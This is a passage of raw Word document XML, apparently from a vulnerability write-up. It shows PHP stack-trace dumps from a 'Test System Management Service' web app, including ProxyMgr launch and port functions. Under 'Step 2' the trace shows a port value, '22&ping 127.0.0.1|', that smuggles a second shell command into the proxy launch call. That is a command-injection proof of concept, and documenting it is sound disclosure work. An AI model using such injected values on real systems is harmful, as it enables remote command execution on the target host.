            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD9ACBD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC4D78D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_labelSuffix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="068E3709" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E1FC95" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms_record</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A3AF54" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128A0322" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A6EC1E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45BD20A7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="039A73C6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="575822E2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'slog' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B3F1B87" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_pageError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F100BAB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'submit',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559C8240" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_defaultAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703DB713" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA54E57" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_title</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Test System Management Service',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BB0B98" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_helpContext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB86B3B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F6AC4D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773CC5BC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="717AAD3D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A54E564" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F0D3EA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A47A040" w14:textId="6E4FFF92" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00A70677">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="682ED3F7" w14:textId="77777777" w:rsidR="00A70677" w:rsidRDefault="00A70677" w:rsidP="00A70677">
      <w:pPr>
        <w:pStyle w:val="Console"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE27E8C" w14:textId="2238E1E5" w:rsidR="00A70677" w:rsidRDefault="00A70677" w:rsidP="005B45A1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B45A1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F3225C" w14:paraId="61B1BA57" w14:textId="77777777" w:rsidTr="00F3225C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FF4BAEF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB44E7E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  0 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223438BA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48710233"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ProxyMgr.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="326E3512" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 258,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F6C583" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>launchProxy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E04017D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProxyMgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB9FC84" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C192135" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ProxyMgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B1BAC25" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA7E2A1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56AE1680" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA2086F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '127.0.0.1:22&amp;ping 127.0.0.1|' =&gt; '4101:1607955351',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362A85A8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18565746" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_dirty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435ED8B8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1607955351,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28ACDED7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AEDA956" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_proxyfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mvap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/web/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>templates_c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>proxyhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8609CE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'm_port0' =&gt; '4101',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6332FB33" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_portRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '16',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DBCBCA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_LAUNCH_THRESHOLD_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C25CC50" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_IDLE_THRESHOLD_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611C0149" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_PROXY_LAUNCH_DELAY_SECONDS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6A40C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ABSOLUTE_MAX_PORTS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 16,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29433A41" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_PROXYFILE_DELIMITER</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; ':',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131E990C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E21523" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5751A6E5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727C8E75" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F721498" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; 4101,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468CC8E2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      1 =&gt; '127.0.0.1',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220372C0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      2 =&gt; '22&amp;ping 127.0.0.1|',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7955F1C2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7128A0A6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA80634" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  1 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F02C325" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38053C82"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OSSIConnector.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BEF0771" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 152,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BFD4713" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getProxyPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9C999E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProxyMgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78BE0395" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9C6C62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ProxyMgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
